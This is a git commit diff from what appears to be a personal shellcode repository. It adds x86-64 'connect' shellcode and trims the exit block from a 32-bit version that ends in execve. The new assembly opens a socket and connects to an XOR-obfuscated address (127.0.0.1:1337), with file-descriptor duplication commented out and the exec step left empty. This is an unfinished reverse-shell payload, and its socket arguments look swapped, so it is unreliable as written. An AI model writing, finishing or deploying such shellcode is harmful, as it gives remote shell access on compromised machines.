diff options
| author | toni <toni@devlap.local> | 2015-04-13 17:33:25 +0200 |
|---|---|---|
| committer | toni <matzeton@googlemail.com> | 2015-04-14 07:50:43 +0200 |
| commit | 31bc5fef31186f02b98b07c529fd389ac4d1b9b4 (patch) | |
| tree | c4f0a0d9f0b08184482d951beb38aa2ffb5c4e8c | |
| parent | de17c3e7e1f412dc39b1e9b08ab735dc14a9faaa (diff) | |
x86-64 connect shellcode
| -rw-r--r-- | shellcode/connect.asm | 6 | ||||
| -rw-r--r-- | shellcode/connect_x64.asm | 48 |
2 files changed, 48 insertions, 6 deletions
diff --git a/shellcode/connect.asm b/shellcode/connect.asm index 3464a3e..fe5002a 100644 --- a/shellcode/connect.asm +++ b/shellcode/connect.asm @@ -58,9 +58,3 @@ mov ebx,esp ; arg mov byte [esp + 8], al ; null-terminate the string mov al,0xb ; execve syscall int 0x80 - -; exit() -mov al,0x1 ; exit syscall -xor ebx,ebx -mov bl,0x42 ; return code -int 0x80 ; kernel mode diff --git a/shellcode/connect_x64.asm b/shellcode/connect_x64.asm new file mode 100644 index 0000000..d1e0ef2 --- /dev/null +++ b/shellcode/connect_x64.asm @@ -0,0 +1,48 @@ +BITS 64 + + +; socket() +xor rax,rax ; zero out rax (SYSCALL NMB) +xor rdi,rdi ; " " rdi (ARG0) +xor rsi,rsi ; " " rsi (ARG1) +mov rdx,rax ; " " rdx (ARG2) +mov byte al,41 ; socketcall syscall +mov byte dil,0x1 ; SOCKTYPE +mov byte sil,0x2 ; SOCKDOMAIN +syscall + +mov rdi,rax + +; connect() +xor rax,rax +push rax +push rax +push 0x1011116E ; XOR-encoded -> 127.0.0.1 +xor dword [rsp],0x11111111 +push word 0x2814 ; push tcp port (XOR-encoded -> 1337) +xor word [rsp],0x1111 ; decode tcp port +push word 0x2 ; 0x2 -> AF_INET +mov rsi,rsp +mov dl,0x10 +mov al,42 +syscall + +; dup2() +;mov rbx,rdi +;xor rdi,rdi +;xor rsi,rsi +;xor rcx,rcx ; zero out count register +;mov cl,0x3 ; loopcount +;dupes: +;xor eax,eax ; zero out eax +;mov al,33 ; dup2() syscall +;dec cl +;mov rdi,rcx +;mov rsi,rbx +;syscall +;inc cl +;loop dupes + +; exec() + +; exit() |